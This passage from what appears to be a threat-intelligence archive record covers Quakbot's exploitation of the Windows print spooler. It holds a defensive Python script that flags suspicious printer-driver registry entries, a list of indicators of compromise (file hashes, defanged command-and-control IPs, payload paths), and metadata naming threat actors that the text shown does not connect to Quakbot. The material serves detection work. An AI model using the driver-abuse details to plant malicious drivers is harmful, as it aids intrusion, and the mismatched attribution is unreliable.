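    reasons = []
    data = values.get('Data File', '').lower()
    config = values.get('Configuration File', '').lower()
    if name.isdigit():
        reasons.append('numeric driver name (the report observed 123456)')
    if data.endswith('.dll'):
        reasons.append('Data File is a DLL: ' + data)
    if config and config == data:
        reasons.append('Configuration File equals Data File: ' + config)
    for field in FIELDS:
        value = values.get(field, '')
        if BS in value or '/' in value:
            reasons.append(field + ' is a path rather than a bare file name: ' + value)
    return reasons


def triage_drivers(drivers):
    '''Return {subkey: reasons} for every suspicious entry in a driver table.'''
    result = {}
    for name, values in drivers.items():
        reasons = triage_driver(name, values)
        if reasons:
            result[name] = reasons
    return result


def load_from_registry():
    '''Read the live driver table on Windows; returns {} where winreg is absent.'''
    try:
        import winreg
    except ImportError:
        return {}
    drivers = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, DRIVERS_SUBKEY) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            with winreg.OpenKey(root, name) as sub:
                values = {}
                for field in FIELDS:
                    try:
                        values[field] = str(winreg.QueryValueEx(sub, field)[0])
                    except FileNotFoundError:
                        pass
            drivers[name] = values
    return drivers


# Constructed driver table: two ordinary-looking entries plus the reported one.
SAMPLE_DRIVERS = {
    'Microsoft Print To PDF': {'Configuration File': 'PrintConfig.dll',
                               'Data File': 'MPDW-PDC.xml', 'Driver': 'mxdwdrv.dll'},
    'Generic PCL6 Driver': {'Configuration File': 'unidrvui.dll',
                            'Data File': 'genpcl6.gpd', 'Driver': 'unidrv.dll'},
    '123456': {'Configuration File': 'spider.dll', 'Data File': 'spider.dll'},
}

if __name__ == '__main__':
    table = load_from_registry() or SAMPLE_DRIVERS
    for name, reasons in triage_drivers(table).items():
        print(name)
        for r in reasons:
            print('   ', r)
```

Confirm a hit by examining the DLL named in the key under C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ (signature, timestamp, hash) and by looking for cmd.exe children of spoolsv.exe, as in the 25443.exe execution quoted above.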
In addition, we have discovered that Quakbot threat\r\nactors abused stolen organizational email credentials to spread new Quakbot campaigns to additional victims.\r\nWe will provide updates on any new discoveries from our ongoing Quakbot investigation.\r\nINDICATORS OF COMPROMISE\r\nType – Indicator of Compromise\r\nWeaponized Office Documents\r\na45df331c681b7e73faf94527cd19a9de28e7f0aa10556a18cb48f7db685ce87\r\naff999aa8b0cb088f858429aeb0f18dd81337981f807c7aa98d95d9ddae34050\r\nc0168eaf2e409a8d1a968e388d665b213b1f7ae232c24df90ab8731b5fd1cbbd\r\n73249da46ad32f57b75746421ca8d96bc62ce7670a7738bfede3d086826e8a87\r\nef0156fd34e136841f28df011c2ecddf58ee4dcf839d25692b52e086beb98d38\r\n511650dfa48dbea1062ba58fc65b52caacbd4b6a752e40f2c3f8c16f1273c68b\r\n40b203a7b40ba1188d0a56a486eac6d4c289ee6ef3a32ec07c245ef44f325a95\r\n4d1a2e62c2f1d7d9d7ef0b81152bfcc85d68bac0c7ab13b8ed6d03ae27f3dda0\r\n6ca376cd53db43cc7781db3e03782ab28213ed722a52e0d38927d3aba516d9b6\r\nZIP Files\r\nc1262d13d3809b9d44a6829357c305308567ae8aeca873cc33307e1eda3a9615\r\n78bccdfce650d1b0c3023ed1cf7174625e88af831865a926c927a320c1177e10\r\n086e81e972597d576da5e7f43f12d5814c78acc5881e6bdc58e5659ee42c264f\r\nDLL payloads\r\n9e63072408a8d0e91a260ae861efb4f64b5585d61a31eeb35c7a2fb595198d2c\r\n9a8dabf648db1df5bfd90f49233fe2d15a4af71792cc337abe1e60289ede7dc1\r\n236f9f37dc2604ed8d3faee0b07fc6bb8f4dde68ed89a137023f641ad6076ca4\r\n57f5a2a3e5f5fd1fcd95aa1896e6a104973cc90a3a6a25393b9b1da053f93092\r\n5896105dd86060733851505905f1e29e0e7dd9ade5b310a0298414d441a7da70\r\naff67b2d5bd2634a6d1800e9c2b2232ad6d09b59e1971afb6b04ea3be477d8cd\r\nd59ea14883b19cd3a51c3742d5e86e474266b9fec821b0b5fbd6ec7b55eb58bc\r\n00eeb0fa83ffd92aaee10d2cf851597f429062ea044863e425be8801a41ef379\r\n7af572d912a2bff85817165acc672ef17f1fd776ea03bcb5cbb848604ba46fbf\r\nCommand and Control 
Server\r\n190[.]73[.]3[.]148\r\n177[.]172[.]5[.]228\r\n181[.]118[.]183[.]27\r\n71[.]13[.]93[.]154\r\n216[.]238[.]71[.]31\r\n216[.]238[.]72[.]121\r\n45[.]9[.]20[.]200\r\n93[.]48[.]80[.]198\r\n86[.]98[.]1[.]197\r\n207[.]246[.]112[.]221\r\n123[.]252[.]190[.]14\r\nPayload Paths\r\nC:\\Datop\\test.test\r\nC:\\Datop\\test1.test\r\nC:\\Datop\\test2.test\r\nC:\\Datop\\good.good\r\nC:\\Datop\\good1.good\r\nC:\\Datop\\good2.good\r\nSource: https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/"
	],
	"report_names": [
		"quakbot-strikes-with-quaknightmare-exploitation"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434183,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe.pdf",
		"text": "https://archive.orkl.eu/c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe.txt",
		"img": "https://archive.orkl.eu/c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe.jpg"
	}
}